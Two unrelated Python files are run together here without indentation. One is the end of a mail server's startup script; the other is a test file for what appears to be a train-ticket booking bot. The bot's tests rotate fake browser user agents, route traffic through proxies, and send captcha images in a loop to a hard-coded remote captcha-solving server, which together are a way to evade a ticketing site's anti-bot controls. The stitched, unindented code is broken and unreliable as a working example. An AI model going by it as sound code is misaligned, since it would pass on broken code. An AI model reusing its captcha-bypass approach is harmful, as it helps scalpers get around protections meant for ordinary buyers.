os.environ["FRONT_ADDRESS"] = resolve(os.environ.get("FRONT_ADDRESS", "front"))
os.environ["HOST_ANTISPAM"] = os.environ.get("HOST_ANTISPAM", "antispam:11332")
os.environ["HOST_LMTP"] = os.environ.get("HOST_LMTP", "imap:2525")
for postfix_file in glob.glob("/conf/*.cf"):
convert(postfix_file, os.path.join("/etc/postfix", os.path.basename(postfix_file)))
if os.path.exists("/overrides/postfix.cf"):
for line in open("/overrides/postfix.cf").read().strip().split("\n"):
os.system('postconf -e "{}"'.format(line))
if os.path.exists("/overrides/postfix.master"):
for line in open("/overrides/postfix.master").read().strip().split("\n"):
os.system('postconf -Me "{}"'.format(line))
for map_file in glob.glob("/overrides/*.map"):
destination = os.path.join("/etc/postfix", os.path.basename(map_file))
shutil.copyfile(map_file, destination)
os.system("postmap {}".format(destination))
os.remove(destination)
convert("/conf/rsyslog.conf", "/etc/rsyslog.conf")
# Run Podop and Postfix
multiprocessing.Process(target=start_podop).start()
if os.path.exists("/var/run/rsyslogd.pid"):
os.remove("/var/run/rsyslogd.pid")
os.system("/usr/lib/postfix/post-install meta_directory=/etc/postfix create-missing")
os.system("/usr/lib/postfix/master &")
os.execv("/usr/sbin/rsyslogd", ["rsyslogd", "-n"])
|
TestAll.py
|
# coding=utf-8
import base64
import threading
import unittest
from collections import OrderedDict
import requests
from agency.agency_tools import proxy
from agency.cdn_utils import CDNProxy
from config.emailConf import sendEmail
from config.serverchanConf import sendServerChan
from init.select_ticket_info import select
def _set_header_default():
header_dict = OrderedDict()
header_dict["Accept"] = "*/*"
header_dict["Accept-Encoding"] = "gzip, deflate"
header_dict["X-Requested-With"] = "superagent"
header_dict[
"User-Agent"] = "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
header_dict["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
class testAll(unittest.TestCase):
def testProxy(self):
"""
        Test whether the proxy is usable.
:return:
"""
_proxy = proxy()
proxie = _proxy.setProxy()
url = "http://httpbin.org/ip"
rsp = requests.get(url, proxies=proxie, timeout=5, headers=_set_header_default()).content
print(u"当前代理ip地址为: {}".format(rsp))
def testEmail(self):
"""
        Test whether sending email works.
:return:
"""
sendEmail(u"订票小助手测试一下")
# def testConfig(self):
# """
    #     Test whether the config is set up correctly
# :return:
# """
def testServerChan(self):
"""
        Test whether ServerChan (WeChat push) works.
:return:
"""
sendServerChan(u"server酱 微信通知测试一下")
def testUserAgent(self):
"""
        Test UserAgent generation.
:return:
"""
from fake_useragent import UserAgent
for i in range(10000):
ua = UserAgent(verify_ssl=False)
print(ua.random)
def testVerfyImage(self):
"""
        Test model loading and captcha recognition.
:return:
"""
from verify.localVerifyCode import Verify
v = Verify()
with open('../tkcode.png', 'rb') as f:
base64Image = base64.b64encode(f.read())
for i in range(5):
t = threading.Thread(target=v.verify, args=(base64Image,))
t.start()
def testRemoteVerfy(self):
"""
        Test whether the remote captcha-solving service works.
:return:
"""
import requests
import time
while True:
try:
starttime = time.time()
rsp = requests.post(url="http://120.77.154.140:8000/verify/base64/",
data={
'imageFile': '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